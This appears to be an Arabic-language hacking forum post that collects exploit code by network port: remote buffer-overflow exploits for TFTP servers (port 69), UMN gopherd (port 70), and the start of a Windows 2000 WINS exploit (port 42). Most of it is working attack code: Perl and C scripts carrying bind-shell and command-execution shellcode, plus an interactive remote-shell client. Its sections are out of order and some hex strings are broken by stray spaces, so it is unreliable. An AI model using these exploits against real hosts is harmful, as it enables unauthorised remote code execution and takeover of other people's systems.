"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x 8d\x7a\x38"
"\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\x d6\x5b\x57"
"\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x 68\xad\xd9"
"\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x 57\xfc\x83"
"\xc4\x64\xff\xd6\x52\xff\xd0\x68\xef\xce\xe0\x60\x 53\xff\xd6"
"\xff\xd0")
mode = "A"*1019+"\xeb\x08\x90\x90"+"\x58\x14\xd3\x74"+"\x90"*16+shell
muha = "\x00\x02" + filename+ "\0" + mode + "\0"
print " Sending evil packet, ph33r"
s.sendto(muha, (host, port))
print " Check port 4444 for bindshell"
# [2008-03-26]
69 TFTP Server for Windows 1.4 ST Remote BSS Overflow Exploit
#!/usr/bin/perl
# TFTPServer SP v1.4 for Windows remote .bss overflow exploit
# The Service or the RunStandAlone version.
# URL: http://sourceforge.net/projects/tftp-server/
#
# Author: tix or tixxDZ <[email protected]>
# Date: 07/05/2008
#
# Tested on Windows XP SP2 French not patched
#
# TFTPServer SP v1.4 is vulnerable to a very long TFTP Error Packet
# Other versions may also be vulnerable.
#
# TFTPServer respect the RFC 1350 for Error packets, lot of other
# TFTP Servers don't respect it.
# TFTP Error Packet: "\x00\x05" . ErrorMsg . "\x00"
#
# BUFFER is at 0041B3AB in the .bss section.
# This exploit will overwrite all the .bss section and some portion of the .idata section
# to patch functions addresses in the IAT.
#
# For the TFTPServer Service we will patch the time() function
# For the TFTPServer StandAlone program we will patch the printf() function
#
# BUFFER = NOPS + SHELLCODE + RET
# we will put and execute our shellcode in the .idata section, .idata => RWE.
use strict;
use IO::Socket::INET;
my $target = shift ||
die "Usage: $0 <target> <type>\n <type> : type of the program\n".
"\t<s> for a TFTP service\n\t<p> for a TFTP simple program\n";
my $type = defined $ARGV[0] ? shift : 's';
my $shellcode =
# windows/shell_bind_tcp - 500 bytes
# http://www.metasploit.com
# EXITFUNC=seh, LPORT=4444
"\x3d\x71\x41\xbf\x75\x04\x66\x32\xfc\x2f\x84\xd4\x 15\x24" .
"\x0a\xfd\x92\xb5\x48\x76\x4b\x19\xe3\x73\x0c\x77\x 4f\x0d" .
"\x4a\x43\x4e\x7c\x75\x1d\x7d\x28\xd6\x96\x79\x14\x 91\x7b" .
"\x1c\xb2\x72\x34\xa9\x9f\xb1\x73\x49\x70\x25\x98\x 7f\x13" .
"\xf5\x88\xe1\x3f\x74\x2c\xba\x7e\x20\xc1\xd1\xe2\x 12\xe0" .
"\x11\xd6\x6b\xd0\xe3\x40\xbf\x9f\x4a\x2f\xb9\xa8\x 3d\xd2" .
"\xeb\x0c\x7a\x2b\xf9\x4b\x49\x71\x05\x76\x37\xb4\x b3\x86" .
"\xd5\x41\x97\x66\xba\x91\x46\xb5\x47\x48\x9b\x35\x a9\x43" .
"\x4f\xbe\xb7\x93\xfc\x2c\x25\x90\x3c\x99\x92\x77\x 02\xfd" .
"\xb8\x42\x98\x15\x14\xb6\x3f\xd4\x27\xf8\x2d\xf5\x 24\x1c" .
"\x67\xbb\x1d\x4e\xb0\xb2\x0d\xb1\x34\x04\x96\xbb\x a0\x0c" .
"\xb8\xde\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85\x c0\x75" .
"\xf7\xc3\xfc\xe8\xee\xff\xff\xff\x5c\x66\x53\x93\x 74\x8e" .
"\x5c\xd3\x7b\x11\x28\x40\xa7\xf6\xa5\xdc\x9b\x7d\x c5\xdb" .
"\x9b\x80\xd9\x6f\x14\x9b\xae\x2f\x8a\x9a\x5b\x86\x 41\xa8" .
"\x10\x18\xbb\xe0\xe6\x82\xef\x87\x27\xc0\xe8\x46\x 6d\x24" .
"\xf7\x8a\x99\xc3\xcc\x5e\x7a\x04\x47\xba\x09\x0b\x 83\x45" .
"\xe5\xd2\x40\x49\xb2\x91\x09\x4e\x45\x4d\xb6\x42\x ce\x18" .
"\xd4\xbe\xcc\x7b\xe7\x8e\x37\x1f\x6c\xb3\xf7\x6b\x 32\x38" .
"\x73\x1b\xae\xed\x08\x9c\xc6\xb3\x66\x93\x98\x45\x 9b\xfb" .
"\xdb\x8c\x05\xaf\x45\x59\xf9\x7d\xe1\xee\x8e\xb3\x ae\x44" .
"\x8e\x64\x38\xae\x9d\x79\x83\x60\xa1\x54\xac\x09\x b8\x3f" .
"\xd3\xe7\x4b\xc2\x86\x9d\x49\x3d\xf8\x0a\x97\xc8\x 0d\x67" .
"\x70\x34\x3b\x2b\x2c\x99\x90\x9f\x91\x4e\x55\x73\x e9\xa1" .
"\x3f\x1b\x04\x1e\xd9\x88\xaf\x7f\xb0\x47\x14\x65\x ca\x50" .
"\x03\x65\xfc\x35\xbc\xc8\x55\x35\x6c\x82\xf1\x64\x a3\xba" .
"\xae\x89\x6a\x6f\x05\x89\x43\xf8\x40\x3c\xe2\xb0\x dd\x40" .
"\x3c\x12\xb5\xea\x94\x6c\xe5\x80\x7f\x74\x7c\x61\x 06\x2d" .
"\x81\xbb\xac\x2e\xad\x22\x25\xb5\x2b\xc3\xda\x58\x 3a\xf6" .
"\x77\xf3\x65\xd0\x4b\x7a\x72\x48\x10\xf4\x9e\xbc\x 58\xf5" .
"\xf4\x41\x1a\xd7\xf6\xfc\xb7\xb4\x8b\x7b\xf0\x11\x 38\xd0" .
"\x68\x14\xc0\x94\x7f\x27\x49\x9f\x80\x01\xea\x48\x 2d\xff" .
"\x5d\x26\xbb\xfe\x0c\x99\x6e\x50\x51\xc9\xf9\xff\x 74\xef" .
"\x37\xac\x79\x26\xad\xac\x7a\xf0\xcd\x83\x0f\xa8\x cd\xa7" .
"\xcb\x33\xd1\x7e\x81\x44\xfd\x17\xd5\x31\xfa\xb8\x 46\xb9" .
"\xd5\xb8\xb8\x45\xda\x46\x38\x46\xda\x46";
my ($RET,$buffer) = "\x01\x01\x42\x00"; # in the .idata section
if ($type =~ /p/i) {
# "\x00\x05" + 20411 bytes needed to patch the printf() function at 00420360
# ---------------------------------------------------------------------------
# 0040EB50 -FF25 60034200 JMP DWORD PTR DS:[<&msvcrt.printf>]
# ---------------------------------------------------------------------------
print STDOUT "Exploiting TFTPServer RunStandAlone program\n";
$buffer = "\x90" x 19907 . $shellcode . $RET;
}
else {
# "\x00\x05" + 20459 bytes needed to patch the time() function at 00420390
# ------------------------------------------------------------------------
# 0040EB60 -FF25 90034200 JMP DWORD PTR DS:[<&msvcrt.time>]
# ------------------------------------------------------------------------
print STDOUT "Exploiting TFTPServer Service program\n";
$buffer = "\x90" x 19955 . $shellcode . $RET;
}
my $sock = IO::Socket::INET->new( PeerAddr => $target,
PeerPort => 69,
Proto => 'udp')
or die "error: $!\n";
$sock->send("\x00\x05" . $buffer, 0);
print STDOUT "done.\n";
exit 0;
# [2008-05-08]
69 ProSysInfo TFTP server TFTPDWIN <= 0.4.2 Univ. Remote BOF Exploit
#!/usr/bin/perl
#
# ProSysInfo TFTP server TFTPDWIN <= 0.4.2
# Universal Remote Buffer Overflow Exploit
# [Works on all Windows versions.]
# ----------------------------------------
# Exploit by SkD ([email protected])
#
# Let's take a description from their page at:
# http://www.tftpserver.prosysinfo.com.pl
#
# "The TFTP Server TFTPDWIN software is a
# multithreaded TFTP protocol server for
# Windows 98/Me/2000/XP/2003. TFTP Server
# TFTPDWIN is compatible with RFC 1350,
# RFC 2347, RFC 2348, and RFC 2349, documents."
#
# Some of their clients include: CISCO, Alcatel-Lucent,
# Intel, AT&T, Panasonic, Boeing ...
#
# Wow, all of these companies use this software!
# This is pretty much serious.
#
# So this is my new exploit and I made it universal like
# the last one. This overflow was pretty much weird at
# first sight, but a bit of looking into the software
# can tell you many things about it!
#
# If Immunity (www.immunityinc.com) can make a commerical
# exploit for this and keep it for private clients,
# so can I ;) but to the public :). Have fun ladies &
# gents.
#
# Usage: prosystftpd_exploit.pl <target IP>
#
# Greets fly to InTeL.
#
# WARNING: Author has no responsibility over the damage
# you do using this!
use IO::Socket;
use warnings;
use strict;
if(!($ARGV[0]))
{
print "[x] ProSysInfo TFTP server TFTPDWIN <= 0.4.2\n";
print " Universal Remote Buffer Overflow Exploit\n\n";
print "[x] Exploit by SkD (skdrat@ hotmail.com)\n\n";
print "[x] Usage: prosystftpd_exploit.pl <target IP>\n\n";
exit(0);
}
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=Pex http://metasploit.com
# Restricted chars = 0x00 0x6e 0x65 0x74
my $shellcode =
"\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x 81\x76\x0e\xaf".
"\x4f\xb9\xec\x83\xee\xfc\xe2\xf4\x53\xa7\xfd\xec\x af\x4f\x32\xa9".
"\x93\xc4\xc5\xe9\xd7\x4e\x56\x67\xe0\x57\x32\xb3\x 8f\x4e\x52\xa5".
"\x24\x7b\x32\xed\x41\x7e\x79\x75\x03\xcb\x79\x98\x a8\x8e\x73\xe1".
"\xae\x8d\x52\x18\x94\x1b\x9d\xe8\xda\xaa\x32\xb3\x 8b\x4e\x52\x8a".
"\x24\x43\xf2\x67\xf0\x53\xb8\x07\x24\x53\x32\xed\x 44\xc6\xe5\xc8".
"\xab\x8c\x88\x2c\xcb\xc4\xf9\xdc\x2a\x8f\xc1\xe0\x 24\x0f\xb5\x67".
"\xdf\x53\x14\x67\xc7\x47\x52\xe5\x24\xcf\x09\xec\x af\x4f\x32\x84".
"\x93\x10\x88\x1a\xcf\x19\x30\x14\x2c\x8f\xc2\xbc\x c7\xbf\x33\xe8".
"\xf0\x27\x21\x12\x25\x41\xee\x13\x48\x2c\xd8\x80\x cc\x4f\xb9\xec";
my $p1="\x00\x01";
my $p2="\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00";
my $ret = "\x5d\x10\x40"; #0040105D -> :) SkD's Tricks
my $nopsled = "\x90" x 10;
my $len = (274 - length($shellcode));
if($len < 0) {
print "[x] Your shellcode is too big! Find another way :)\n";
exit(0);
}
my $overflow = "\x41" x $len;
my $packet = (($p1).($nopsled).($shellcode).(($overflow)).($ret ).($p2));
my $sock = new IO::Socket::INET(Proto=>'udp', PeerAddr=>$ARGV[0], PeerPort=>'69');
die "[x] Cannot Connect!\n" unless $sock;
print "[x] Connected to daemon :)\n";
print "[x] Sending packet..\n";
print $sock $packet;
sleep(1);
close $sock;
print "[x] Target owned!\n";
exit(0);
# [2008-12-14]
##################################
انتهينا من بورت 69
##################################
نبداء بـ بورت 70
70 Gopherd <= 3.0.5 FTP Gateway Remote Overflow Exploit
/* [ UMN gopherd[2.x.x/3.x.x]: remote "ftp gateway" buffer overflow. ]
*
* by: vade79/v9 v9 at fakehalo.deadpig.org (fakehalo/realhalo)
*
* three years since last audit, code is a little more secure. but,
* still found a few potentially exploitable situations. this
* exploits the "ftp gateway" feature of gopherd. the gateway is
* intended to act as a proxy of sorts. between the server, and the
* client. the bug occurs when gopherd attempts to read a ftp
* list(LIST), and strcpy()'s the filename without checking the
* length. an example would look like this(including where to put
* the shellcode at):
*
* "-rwxrwxrwx 1 <shellcode> root 1 Dec 31 23:59 <long string>"
*
* to exploit this, there needs to be a fake ftp daemon of sorts.
* and, do to the nature of gopherd's "ftp gateway" support, must be
* on port 21. which means this exploit needs to run as root.
*
* when exploiting this bug, it is made moderately easy by gopherd.
* because, the buffer that holds the string is 8192 bytes, and on
* the stack. meaning the amount of NOPs used can be around 7500
*
* requirements(general):
* gopherd must have "ftp gateway" support included on compile,
* this is true by default. but, the "--disable-ftp" configure
* option will make exploitation of this bug impossible.
*
* requirements(for this exploit):
* the server must be running linux/x86(what i made the exploit
* for). gopherd must be started in the root directory "/",
* running with the -c command line option, or started as non-root.
* any of those three situations will allow for successful
* exploitation. this does not mean it is impossible to exploit
* otherwise. but, gopherd will be in a chroot()'d state. and, as
* of the 2.4 kernel series, i have seen no such way to break
* chroot. if it is desired to still run code, even in a limited
* environment, simply change the shellcode to your likings. also,
* the exploit must be ran as root, to bind to port 21.
*
* bug location(gopher-3.0.5/gopherd/ftp.c):
* 1800:int
* 1801:GopherFile(FTP ftp, char buf, char theName)
* 1802:{
* ...
* 1805:char tmpName[256];
* ...
* 1811:strcpy(tmpName, buf);
*
* vulnerable versions:
* v3.0.5, v3.0.4, v3.0.3, v3.0.2, v3.0.1, v3.0.0(-1),
* v2.3.1. (patch level 0 through 15/all 2.3.1 versions)
* (it is assumed versions before 2.3.1 are vulnerable as well)
*
* tested on platforms(with no code changes/offsets):
* RedHat7.1, 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686
* Mandrake9.1, 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003 i686
* (tested on both v3.0.5, and v2.3.1 sources / no changes. this
* should apply to pretty much any generic linux, do to the amount
* of NOPs(~7500 bytes guessing room), and on the stack)
*
* example usage:
* # cc xgopherd2k3-ftp.c -o xgopherd2k3-ftp
* # ./xgopherd2k3-ftp localhost 127.0.0.1
* [] UMN gopherd[2.x.x/3.x.x]: remote buffer overflow exploit.
* [] "UMN gopherd remote ftp gateway buffer overflow"
* [] by: vade79/v9 [email protected] (fakehalo)
*
* [] target: localhost:70 - localhost: 127.0.0.1 - offset: 0xbff$
*
* [] starting ftp daemon. (background)
* [] attempting to connect: localhost:70.
* [] connected successfully: localhost:70.
* [?] +GOPHERD: "ftp://x:[email protected]".
* [?] ftp daemon connection established.
* [?] -FTPD: "SYST".
* [?] -FTPD: "USER x".
* [?] -FTPD: "PASS x".
* [?] -FTPD: "PORT 127,0,0,1,128,35".
* [?] -FTPD: "LIST -F".
* [?] +FTPD: "-rwxrwxrwx 1 <shellcode(7800)> root 1 Dec 31 23:59 $
* [] waiting for ftp daemon to finish. (ctrl-c if needed)
* [] ftp daemon connection closed.
* [] checking to see if the exploit was successful.
* [] attempting to connect: localhost:45295.
* [] successfully connected: localhost:45295.
*
* Linux localhost.localdomain 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2$
* uid=13(gopher) gid=30(gopher) groups=0(root),1(bin),2(daemon),3$
*
* note: when using your "local ip", do not make it 127.0.0.1, like
* in the example. it must be the ip you connect to the internet
* through. (not an local area network ip, or whatnot)
* /
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/ change defines at will. (cept EIPSIZE, not recommended) /
#define CODESIZE 7800 / part of buf[8192]/stack. (~-350) /
#define EIPSIZE 292 / riding a fine line, don't make too big. /
#define RETADDR 0xbfffe29b / center of NOPs for me. (~+-3500) /
#define TIMEOUT 10 / connection timeout. (general) /
/ globals. /
static char x86_exec[]= / bindshell(45295)&, netric/S-poly. /
"\x57\x5f\xeb\x11\x5e\x31\xc9\xb1\xc8\x80\x44\x0e\x ff\x2b\x49"
"\x41\x49\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x06\x 95\x06\xb0"
"\x06\x9e\x26\x86\xdb\x26\x86\xd6\x26\x86\xd7\x26\x 5e\xb6\x88"
"\xd6\x85\x3b\xa2\x55\x5e\x96\x06\x95\x06\xb0\x25\x 25\x25\x3b"
"\x3d\x85\xc4\x88\xd7\x3b\x28\x5e\xb7\x88\xe5\x28\x 88\xd7\x27"
"\x26\x5e\x9f\x5e\xb6\x85\x3b\xa2\x55\x06\xb0\x0e\x 98\x49\xda"
"\x06\x95\x15\xa2\x55\x06\x95\x25\x27\x5e\xb6\x88\x d9\x85\x3b"
"\xa2\x55\x5e\xac\x06\x95\x06\xb0\x06\x9e\x88\xe6\x 86\xd6\x85"
"\x05\xa2\x55\x06\x95\x06\xb0\x25\x25\x2c\x5e\xb6\x 88\xda\x85"
"\x3b\xa2\x55\x5e\x9b\x06\x95\x06\xb0\x85\xd7\xa2\x 55\x0e\x98"
"\x4a\x15\x06\x95\x5e\xd0\x85\xdb\xa2\x55\x06\x95\x 06\x9e\x5e"
"\xc8\x85\x14\xa2\x55\x06\x95\x16\x85\x14\xa2\x55\x 06\x95\x16"
"\x85\x14\xa2\x55\x06\x95\x25\x3d\x04\x04\x48\x3d\x 3d\x04\x37"
"\x3e\x43\x5e\xb8\x60\x29\xf9\xdd\x25\x28\x5e\xb6\x 85\xe0\xa2"
"\x55\x06\x95\x15\xa2\x55\x06\x95\x5e\xc8\x85\xdb\x a2\x55\xc0"
"\x6e";
char ftp_ip[64+1];
unsigned short ftp_port=0;
pid_t ftp_pid=0;
/ return address offset. (arg3) /
unsigned int offset_ra=0;
/ functions. /
char geteip(void);
char getcode(void);
unsigned short ftpd_read(int);
void ftpd_handler(int,char );
void ftpd_list(char ,unsigned short);
void ftpd(void);
void gopher_connect(char ,unsigned short,char );
void getshell(char ,unsigned short);
void printe(char ,short);
/ signal handlers. /
void sig_ctrlc_wait(){if(ftp_pid)kill(ftp_pid,9);}
void sig_ctrlc_exit(){printe("ctrl-c abort.",1);}
void sig_alarm(){printe("alarm/timeout hit.",1);}
/ begin. /
int main(int argc,char argv){
unsigned short gopher_port=70; / default. /
unsigned int i=0;
char gopher_host;
printf("[] UMN gopherd[2.x.x/3.x.x]: remote buffer o"
"verflow exploit.\n[] \"UMN gopherd remote ftp gatew"
"ay buffer overflow\"\n[] by: vade79/v9 v9@fakehalo."
"deadpig.org (fakehalo)\n\n");
if(argc<3){
printf("[!] syntax: %s <hostname[:port]> <local/your"
"_ip> [offset]\n\n",argv[0]);
exit(1);
}
if(!(gopher_host=(char )strdup(argv[1])))
printe("main(): allocating memory failed",1);
for(i=0;i<strlen(gopher_host);i++)
if(gopher_host[i]==':')
gopher_host[i]=0x0;
if(index(argv[1],':'))
gopher_port=atoi((char )index(argv[1],':')+1);
if(!gopher_port)
gopher_port=70;
if(argc>3)
offset_ra=atoi(argv[3]);
printf("[] target: %s:%d - localhost: %s - offset: 0x%.8x(+"
"%u)\n\n",gopher_host,gopher_port,argv[2],RETADDR,offset_ra);
signal(SIGINT,sig_ctrlc_wait);
signal(SIGALRM,sig_alarm);
/ start ftpd, as a different process. /
switch(ftp_pid=fork()){
case -1:
printe("fork() ftpd failure.",1);
break;
case 0:
signal(SIGINT,SIG_DFL);
ftpd();
_exit(0);
break;
default:
printf("[] starting ftp daemon. (background)\n");
break;
}
gopher_connect(gopher_host,gopher_port,argv[2]);
/ gotta let the ftpd magic happen, plenty of time. /
printf("[] waiting for ftp daemon to finish. (ctrl-c if"
" needed)\n");
waitpid(ftp_pid,0,0);
signal(SIGINT,sig_ctrlc_exit);
getshell(gopher_host,45295); / defined in shellcode. /
printf("[!] exploit failed.\n");
exit(0);
}
char geteip(void){
unsigned int i=0;
char buf;
if(!(buf=(char )malloc(EIPSIZE+1)))
printe("ftpd_read(): allocating memory failed.",1);
memset(buf,0x0,EIPSIZE+1);
for(i=0;i<EIPSIZE;i+=4){(long )&buf[i]=(RETADDR+offset_ra);}
return(buf);
}
char getcode(void){
char buf;
if(!(buf=(char )malloc(CODESIZE+1)))
printe("getcode(): allocating memory failed",1);
memset(buf,0x90,(CODESIZE-strlen(x86_exec)));
memcpy(buf+(CODESIZE-strlen(x86_exec)),x86_exec,
strlen(x86_exec));
return(buf);
}
unsigned short ftpd_read(int sock){
char buf;
if(!(buf=(char )malloc(4096+1)))
return(1);
memset(buf,0x0,4096+1);
if(read(sock,buf,4096)<1)
return(1);
ftpd_handler(sock,buf);
return(0);
}
void ftpd_handler(int sock,char buf){
unsigned int addr1,addr2,addr3,addr4,port1,port2,i;
/ clean up for display, changes nothing critical. /
for(i=0;i<strlen(buf);i++)
if(buf[i]=='\r'||buf[i]=='\n')
buf[i]=0x0;
if(strlen(buf)){
printf("[?] -FTPD: \"%s\".\n",buf);
if(!strncmp("SYST",buf,4))
dprintf(sock,"215 UNIX Type: L8\n");
else if(!strncmp("USER ",buf,5))
dprintf(sock,"331 login ok.\n");
else if(!strncmp("PASS ",buf,5))
dprintf(sock,"230 access granted.\n");
else if(!strncmp("PORT ",buf,5)){
sscanf(buf,"PORT %u,%u,%u,%u,%u,%u",&addr1,&addr2,&addr3,
&addr4,&port1,&port2);
memset(ftp_ip,0x0,64+1);
snprintf(ftp_ip,64,"%u.%u.%u.%u",addr1,addr2,addr3,addr4);
ftp_port=((port1256)+port2);
dprintf(sock,"200 PORT command successful.\n");
}
else if(!strncmp("LIST",buf,4)){
dprintf(sock,"150 Opening connection.\n");
/ send the fake file list, the exploit itself. /
if(strlen(ftp_ip)&&ftp_port)
ftpd_list(ftp_ip,ftp_port);
dprintf(sock,"226 Transfer complete.\n");
sleep(1);
/ nothing else of importance. /
close(sock);
}
}
return;
}
void ftpd_list(char ip,unsigned short port){
int sock;
struct hostent t;
struct sockaddr_in s;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
s.sin_family=AF_INET;
s.sin_port=htons(port);
if((s.sin_addr.s_addr=inet_addr(ip))){
if(!(t=gethostbyname(ip)))
printe("couldn't resolve ftp_list hostname/ip.",1);
memcpy((char)&s.sin_addr,(char)t->h_addr,
sizeof(s.sin_addr));
}
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr )&s,sizeof(s)))
printe("ftpd_list connection failed.",1);
alarm(0);
/ the exploit itself, what changes the EIP. /
/ i just put the shellcode where the user/owner /
/ of the file would normally go, goes into the /
/ fat buf[8192] buffer, yummy. /
printf("[?] +FTPD: \"-rwxrwxrwx 1 <shellcode(%u)> root "
"1 Dec 31 23:59 <eip(%u)>\".\n",CODESIZE,EIPSIZE);
dprintf(sock,"-rwxrwxrwx 1 %s root 1 Dec 31 23:59 %s\n",
getcode(),geteip());
sleep(1); / not needed, safe call. /
close(sock);
return;
}
void ftpd(void){
int ssock,sock,salen,so=1,i=0;
struct sockaddr_in ssa,sa;
ssock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
/ just incase used multiple times, good habit anyways. /
setsockopt(ssock,SOL_SOCKET,SO_REUSEADDR,(void )&so,sizeof(so));
/ not everywheres. /
#ifdef SO_REUSEPORT
setsockopt(ssock,SOL_SOCKET,SO_REUSEPORT,(void )&so,sizeof(so));
#endif
ssa.sin_family=AF_INET;
/ must be default, gopherd limitations. :( /
ssa.sin_port=htons(21);
ssa.sin_addr.s_addr=INADDR_ANY;
if(bind(ssock,(struct sockaddr )&ssa,sizeof(ssa))==-1)
printe("could not bind socket, ftpd already running?",1);
listen(ssock,1);
bzero((char)&sa,sizeof(struct sockaddr_in));
/ some things i just don't see the reason for. :/ /
salen=sizeof(sa);
sock=accept(ssock,(struct sockaddr )&sa,&salen);
close(ssock); / close server socket. /
printf("[] ftp daemon connection established.\n");
/ welcome! /
dprintf(sock,"220 FakeFTPD.\n");
while(!i)
i=ftpd_read(sock);
close(sock);
printf("[] ftp daemon connection closed.\n");
return;
}
void gopher_connect(char hostname,unsigned short port,
char myip){
int sock;
struct hostent t;
struct sockaddr_in s;
printf("[] attempting to connect: %s:%d.\n",hostname,port);
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
s.sin_family=AF_INET;
s.sin_port=htons(port);
if((s.sin_addr.s_addr=inet_addr(hostname))){
if(!(t=gethostbyname(hostname)))
printe("couldn't resolve gopher hostname.",1);
memcpy((char)&s.sin_addr,(char)t->h_addr,
sizeof(s.sin_addr));
}
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr )&s,sizeof(s)))
printe("gopher connection failed.",1);
alarm(0);
printf("[] connected successfully: %s:%d.\n",hostname,port);
printf("[?] +GOPHERD: \"ftp://x:x@%s\".\n",myip);
sleep(1); / had problems, without a delay here. /
dprintf(sock,"ftp://x:x@%s\n",myip);
sleep(1); / doesn't really matter, but to be safe. :/ /
/ leave gopher socket open, for the duration. /
return;
}
/ same getshell() routine as usual. /
void getshell(char hostname,unsigned short port){
int sock,r;
fd_set fds;
char buf[4096+1];
struct hostent he;
struct sockaddr_in sa;
printf("[] checking to see if the exploit was successful.\n");
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))= =-1){
printe("getshell(): socket() failed",0);
return;
}
sa.sin_family=AF_INET;
if((sa.sin_addr.s_addr=inet_addr(hostname))){
if(!(he=gethostbyname(hostname))){
printe("getshell(): couldn't resolve",0);
return;
}
memcpy((char )&sa.sin_addr,(char )he->h_addr,
sizeof(sa.sin_addr));
}
sa.sin_port=htons(port);
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
printf("[] attempting to connect: %s:%d.\n",
hostname,port);
if(connect(sock,(struct sockaddr )&sa,sizeof(sa))){
printf("[!] connection failed: %s:%d.\n",
hostname,port);
return;
}
alarm(0);
printf("[] successfully connected: %s:%d.\n\n",
hostname,port);
signal(SIGINT,SIG_IGN);
write(sock,"uname -a;id\n",13);
while(1){
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sock,&fds);
if(select(sock+1,&fds,0,0,0)<1){
printe("getshell(): select() failed",0);
return;
}
if(FD_ISSET(0,&fds)){
if((r=read(0,buf,4096))<1){
printe("getshell(): read() failed",0);
return;
}
if(write(sock,buf,r)!=r){
printe("getshell(): write() failed",0);
return;
}
}
if(FD_ISSET(sock,&fds)){
if((r=read(sock,buf,4096))<1)
exit(0);
write(1,buf,r);
}
}
close(sock);
return;
}
void printe(char err,short e){
printf("[!] %s\n",err);
if(e){
/ don't want to exit with ftpd still running. /
if(ftp_pid)
kill(ftp_pid,9);
printf("[!] exploit failed.\n");
exit(1);
}
return;
}
// [2003-08-22]
#####################################
أنتهينا من طرح 4 بورتات بورت 42 و بورت 53 و بروت 69 و بورت 70
ارجو حفظ الحقوق لجيوش الهكر
تحياتي
#####################################
السلام عليكم و رحمة الله و بركاتة
إن شاء الله تكونو في افضل حال
أقدم لكم في الموضوع اربع بورتات وثغراتها
وهاهي الان بين يديكم بورت 42 و بروت 53 وبروت 69 و بورت 70
نقول بسم الله الرحمن الرحيم
نبداء بـ بورت 42
42 MS Windows 2000 WINS Remote Code Execution Exploit
/************************************************** ***********/
/* ZUCWins 0.1 - Wins 2000 remote root exploit */
/* Exploit by: zuc <[email protected]> */
/* works on Windows 2000 SP3/SP4 probably every language */
/************************************************** ***********/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <time.h>
#include <netinet/in.h>
#include <curses.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>
char shellcode[] =
"\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\x59\x 6c\x59\xf8"
"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x 53\x32\x5f"
"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\x ff\xff\x5d"
"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x 8b\x70\x1c"
"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x 5b\x78\x01"
"\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x 51\x52\x8b"
"\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x 8b\x01\xfe"
"\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x 09\x8d\x44"
"\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x 5e\x56\x50"
"\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x 01\xf8\x0f"
"\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\xbe\x fe\x4d\x08"
"\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\x89\x c7\x6a\x02"
"\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x50\x8b\x 45\x04\x35"
"\x93\x93\x93\x93\x89\x45\x04\x66\x8b\x45\x02\x66\x 35\x93\x93"
"\x66\x89\x45\x02\x58\x89\xce\x31\xdb\x53\x53\x53\x 53\x56\x46"
"\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30\x6a\x10\x 55\x57\xff"
"\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55\x55\xff\x 55\xec\x8d"
"\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65\x68\x5c\x 63\x6d\x64"
"\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53\x53\x fe\xca\x01"
"\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\xb1\x 08\x53\x53"
"\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\xf0\x 6a\xff\xff"
"\x55\xe4";
char mess[] =
"\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\x3c\x 01\x02\x03\x04"
// "\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\x3c\x 01\x02\x03\x04"
"\x6c\xf4\x3d\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x 00\x02\x4e\x05\x00\x02\
x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\x4 e\x05\x00\x02\x4e\x05";
char rep[] =
"\x90\x01\x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x 90\x00\x4e\x05\x90\x00\
x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x90\x03\x4 e\x05\x90\x00\x4e\x05";
void usage();
